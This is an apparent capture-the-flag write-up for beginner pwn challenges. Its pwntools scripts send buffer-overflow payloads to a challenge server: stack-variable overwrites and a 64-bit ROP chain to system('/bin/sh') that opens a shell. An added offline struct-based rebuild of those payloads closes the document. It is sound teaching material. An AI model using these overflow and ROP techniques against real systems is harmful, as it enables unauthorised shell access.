Tools used:
Ubuntu 16.04
pwntools
EAST
gdb-peda
1、get_shell
Connecting to the service with nc gives a shell directly; run ls to list the directory, find the file named flag, and cat flag to get the flag.
Below is the general approach.
Looking at the program: it is a 64-bit ELF.
Then check the protection mechanisms.
Open it in IDA, find the main function, and press F5 to view the pseudo-code.
The program calls the system function to spawn a shell, so simply connecting gives a shell.
from pwn import *
r = remote('111.198.29.45', 51214)
r.interactive()
2、CGfsb
3、when_did_you_born
Check the protection mechanisms.
Then drag it into IDA.
The program asks for v5: entering 1926 cats the flag, but entering 1926 directly makes the program exit. The gets function can overflow, so when entering the name (v4) we fill it with meaningless characters until it overflows and overwrites the original value of v5 with 1926.
Double-clicking v4 (var_20) and v5 (var_18) in IDA shows they are 0x8 bytes apart.
When more than 0x8 characters are entered for v4, the bytes past the 8th overwrite v5, reassigning it.
We can construct the script:
from pwn import *
r = remote('111.198.29.45', 51232)
r.recvuntil(b"What's Your Birth?")
r.sendline(b'2019')  # arbitrary value
r.recvuntil(b"What's Your Name?")
payload = b'a' * 0x8 + p32(0x786)  # 0x786 is 1926 in decimal
r.sendline(payload)
r.interactive()
Run it and get the flag.
4、hello_pwn
64-bit ELF
NX protection is enabled.
Looking at it in IDA: if dword_60106C equals 1853186401, the sub_400686 function runs and gives the flag.
The read call has an overflow, and unk_601068 and dword_60106C are 4 bytes apart, so the value of dword_60106C can easily be overwritten.
Script:
from pwn import *
# p = process('./hello_pwn')  # local test
p = remote('111.198.29.45', 31449)
payload = b'a' * 0x4 + p64(1853186401)  # 4 bytes fill unk_601068, the next bytes land on dword_60106C
p.recvuntil(b"bof")
p.sendline(payload)
p.interactive()
Run it.
5、level0
The program is 64-bit.
NX protection is enabled.
First look at the pseudo-code.
main returns vulnerable_function, where the read call has an overflow.
Looking at the other functions, _system can execute system commands.
Shift+F12 to view the strings; the shell string is found.
The idea is clear: overflow through read, then call system with /bin/sh as its parameter to get a shell.
But this program is 64-bit, which differs from 32-bit: parameters cannot simply be passed on the stack. In a 64-bit program the first parameter is stored in a register; the first six parameters go in rdi, rsi, rdx, rcx, r8, r9 in order, so we need to find the address of a pop rdi gadget.
Then find the address of '/bin/sh'.
And the address of system.
The script is as follows:
from pwn import *
r = remote('111.198.29.45', 47491)
rdi_add = 0x400663    # pop rdi; ret
shell_add = 0x400684  # "/bin/sh"
sys_add = 0x400460    # system
payload = b'a' * 0x88 + p64(rdi_add) + p64(shell_add) + p64(sys_add)
r.sendline(payload)
r.interactive()
-------------------------- split line --------------------------
Later, I admit I was blind and didn't see that the callsystem shell function can be called directly.
Rewriting the script:
from pwn import *
r = remote('111.198.29.45', 47491)
payload = b'a' * 0x88 + p64(0x400596)  # return straight into callsystem
r.sendline(payload)
r.interactive()
The result is the same, so no further demo.
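As an added example (not from the original writeup), the three payload layouts above (when_did_you_born, hello_pwn, level0) rebuilt with plain struct so their byte layout can be checked offline without pwntools or a target. Addresses and offsets are the ones quoted in this writeup; the helper names are my own, and the 0x80 buffer size for level0 (0x88 minus the 8-byte saved rbp) is an assumption.

```python
import struct

# Added example, not from the original writeup: the page's payloads rebuilt with
# struct so that the layout can be inspected offline. Helper names are mine.

def p32(v):
    return struct.pack("<I", v)

def p64(v):
    return struct.pack("<Q", v)

def born_payload(v4_off=0x20, v5_off=0x18, value=1926):
    """when_did_you_born: v4 is at rbp-0x20 (var_20), v5 at rbp-0x18 (var_18).
    gets() writes upward from v4, so (v4_off - v5_off) filler bytes reach v5 and
    the next 4 bytes become v5's new value."""
    pad = v4_off - v5_off
    if pad <= 0:
        raise ValueError("v5 must sit above v4 on the stack for gets() to reach it")
    return b"a" * pad + p32(value)

def hello_payload(magic=1853186401):
    """hello_pwn: read() writes into unk_601068; dword_60106C is 4 bytes further on,
    so 4 filler bytes followed by the 8-byte value put the low dword of the value
    into dword_60106C. 1853186401 packs little-endian to b'aaun'."""
    return b"a" * 4 + p64(magic)

def level0_chain(buf_size=0x80, pop_rdi=0x400663, binsh=0x400684, system=0x400460):
    """level0: buffer plus saved rbp (0x88 bytes, buf_size is assumed), then the
    return-address slot and the slots above it are consumed as a ROP chain:
    pop rdi; ret -> rdi = &"/bin/sh" -> system (SysV ABI: 1st argument in rdi)."""
    pad = buf_size + 8
    return b"a" * pad + p64(pop_rdi) + p64(binsh) + p64(system)

def chain_words(payload, pad):
    """Read back the 8-byte slots after the padding, in the order ret will pop them."""
    tail = payload[pad:]
    return [struct.unpack("<Q", tail[i:i + 8])[0] for i in range(0, len(tail), 8)]

if __name__ == "__main__":
    print(born_payload())
    print(hello_payload())
    print([hex(w) for w in chain_words(level0_chain(), 0x88)])
```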